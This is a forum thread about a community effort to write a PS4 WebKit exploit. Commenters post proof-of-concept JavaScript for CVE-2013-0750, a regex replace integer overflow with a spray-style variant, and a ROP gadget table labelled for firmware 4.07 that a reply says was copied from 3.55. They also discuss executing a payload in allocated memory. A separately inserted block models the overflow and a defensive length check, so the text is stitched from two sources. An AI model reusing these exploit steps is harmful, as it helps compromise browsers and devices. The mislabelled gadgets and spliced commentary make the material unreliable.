After lots of news articles about PS4 Linux and the fact it is not going to see a release because of drama; I got to the idea to make an exploit together with the community.

Presenting the PS4webkit project!
  • So what is this "project" all about?
My plan is to develop a webkit/userland exploit with the help of the whole community; it's pretty unlikely to succeed, but hey! We can always try.
  • But how can I contribute?
Simple: if you have any research, write-ups, CVEs, code or anything that could be useful to other contributors, commit it on the GitHub or paste it into the comments on this thread.
  • Are there any rules you need to follow?
Just to keep all code clean and as stable as possible, there are some things you must not do to the code:
  1. Add credits to your code (full ASCII banners are not allowed, but a single-line comment mentioning you is allowed if you have written a big piece of code)
  2. Don't commit code if you don't know what it does, seriously, leave it to the real devs (if any will ever join :p)
  3. Post research and code in their respective branch
  • So where is the github?
The project GitHub is located at https://github.com/kazookid0/PS4webkit

Let's try to make something out of it. (btw plz no hate i tried lol)
 

Comments

I can confirm @yota1979 for Firmware 4.05. But there is no black screen after "undefined is not a function...."; it's loading a bit and going back to the browser with a blank html page (the one with the exploit). The exploit writer says there are "three places that code can be executed". Does anyone know how to do so?

So is this a working exploit? What can we do with them?

Hi @Seedlord, as you say about the exploit that I have posted:

1) You are right when you say this:
it's loading a bit and going back to the browser with a blank html page

But (I have to test much more) in four cases (I have to find out how to reproduce it every time) my browser freezes for 1/2 sec, after that I have a black screen, and after a few seconds I have the error message.

I have 2 questions:

1) How do I insert code to execute when the browser crashes (black screen)? In this case, if the exploit is a webkit exploit, how do I verify it? Do I have to try to insert a FreeBSD exploit to test?

2) "Note that there are three places that code can be executed after the neutered check in this function, the begin and end parameter, and the value, which is converted in setRangeToValue." I'd also like to know how I can change this value (not exactly how, but how and why I have to change it).
 
Bumping this to see if there has been any progress / learning on this project. I don't have coding experience but still like to hear about what's been tried.
 
Hi, has someone tried CVE-2013-0750? I tried the following code on my PS4 4.07 and got the error "There is not enough free system memory."
Code:
<html>
    <script type="text/javascript">
        // Grow x by doubling until it is at least n characters, then cut it to exactly n
        function puff(x, n){
            while(x.length<n) x+=x;
            x = x.substring(0, n);
            return x;
        }

        var x = "1";
        var rep = "$1";

        x = puff(x, 1<<20);     // 1 MiB string: a single match for /(.+)/g
        rep = puff(rep, 1<<16); // 32768 "$1" back-references, each expands to the whole match
        var y = x.replace(/(.+)/g, rep);
        alert(y.length);
    </script>

</html>
 

you need a pointer into the memory
 
Hi @monastry, I'm a computer systems engineer and developer but I don't have strong knowledge in hacks. I found some documents about this CVE, but I'm lost.

https://securitylab.disi.unitn.it/lib/exe/fetch.php?media=teaching:offtech:2014:report_la_spina_168100.pdf

Code:
<html>
    <script type="text/javascript">
        // Grow x by doubling until it is at least n characters, then cut it to exactly n
        function puff(x, n) {
            while (x.length < n) x += x;
            x = x.substring(0, n);
            return x;
        }

        function buggedReplace(i) {
            var x = unescape("%u0c0c%u0c0c");
            var rep = "$1";
            x = puff(x, (1 << 26) + i); // allocate i blocks of 64 bytes
            rep = puff(rep, 1 << 7);    // replace 64 times
            var y = x.replace(/(.+)/g, rep);
        }

        function exploitIt() {
            //spray();
            buggedReplace(1);
        }
    </script>
</html>
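Added example (not from the thread or the linked report): it models the result-length arithmetic of x.replace(/(.+)/g, rep) when rep is built from "$1" tokens, which is what both PoCs above exercise, and shows the overflow check a replace implementation needs before allocating. It assumes the input contains no line terminators, so /(.+)/g yields exactly one match covering the whole string.

```javascript
// Added example: models the result length of x.replace(/(.+)/g, rep) with
// rep made of "$1" tokens, as in the CVE-2013-0750 PoCs above.
// Assumption: x has no line terminators, so there is one match = the whole string.
const UINT32_MAX = 0xFFFFFFFF;

// puff("$1", n) yields n chars of "$1$1...", i.e. floor(n / 2) back-references.
function backrefCount(repLen) {
  return Math.floor(repLen / 2);
}

// Exact result length: every "$1" expands to the whole match (inputLen chars).
// Number is exact below 2^53, so this model itself cannot overflow.
function expectedReplaceLength(inputLen, repLen) {
  return backrefCount(repLen) * inputLen;
}

// What an engine that keeps the length in 32 bits would compute: low 32 bits only.
function truncated32(len) {
  return len % 2 ** 32;
}

// Hardened form: refuse the replacement instead of allocating a wrapped length.
function checkedReplaceLength(inputLen, repLen) {
  const len = expectedReplaceLength(inputLen, repLen);
  if (len > UINT32_MAX) {
    throw new RangeError("replace result length " + len + " exceeds 32 bits");
  }
  return len;
}

function analyse(inputLen, repLen) {
  const exact = expectedReplaceLength(inputLen, repLen);
  return { exact, truncated32: truncated32(exact), overflows32: exact > UINT32_MAX };
}

// Sanity check of the model against the real engine on a small constructed input:
// inputLen copies of "1" and repLen/2 copies of "$1", then compare lengths.
function modelMatchesEngine(inputLen, repLen) {
  const x = "1".repeat(inputLen);
  const rep = "$1".repeat(backrefCount(repLen));
  return x.replace(/(.+)/g, rep).length === expectedReplaceLength(inputLen, repLen);
}

// First PoC: 2^15 back-references * 2^20 chars = 2^35 chars (64 GiB of UTF-16),
// so the console runs out of memory long before any 32-bit length wraps.
// Second PoC: 64 back-references * (2^26 + 1) chars = 2^32 + 64, which a 32-bit
// length wraps to 64: the kind of integer overflow CVE-2013-0750 describes.
```

The second PoC's "allocate i blocks of 64 bytes" comment is exactly this wrapped value: the result buffer is sized from 64*i while the copy loop still writes 2^32 + 64*i characters.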
 

This is what I am talking about; it is for 3.55, but I am trying to find the entry point for 4.07.

Code:
'PlayStation 4 4.07': {
        'xchg rax, rsp; dec dword ptr [rax - 0x77]': new gadget(VTABLE, -0x18a353f),
        'pop rcx; pop rcx': new gadget(VTABLE, -0x5e970c),
        'pop rcx': new gadget(VTABLE, -0xab7d4c),
        'add dword ptr [rax - 0x77], ecx': new gadget(VTABLE, -0x18c3d40),
        'pop rdi': new gadget(VTABLE, -0x11d1d76),
        'mov qword ptr [rdi], rax': new gadget(VTABLE, -0x2372c99),
        'pop rsi': new gadget(VTABLE, -0x88d954),
        'pop rdx': new gadget(VTABLE, -0xac2f8e),
        'pop rax': new gadget(VTABLE, -0x5e9bfd),
        'syscall': new gadget(VTABLE, -0x3dc1a6),
        'pop rsp': new gadget(VTABLE, -0x1abc011),
        'mov rax, qword ptr [rax]': new gadget(VTABLE, -0x238e98d),
        'pop r8': new gadget(VTABLE, -0x15ca007),
        'pop r9': new gadget(VTABLE, -0x17202f1),
    },
OK, you need the entry point or points to a function of the PS4's webkit. In the case above webkit will throw the error "There is not enough free system memory." We need to allocate memory without any error, then write the payload and execute it in the allocated memory.

you can find webkit source code here https://doc.dl.playstation.net/doc/ps4-oss/webkit.html
 
Looks familiar
 
They are just the 3.55 gadgets and you have put 4.07 on it? ....... Why?
 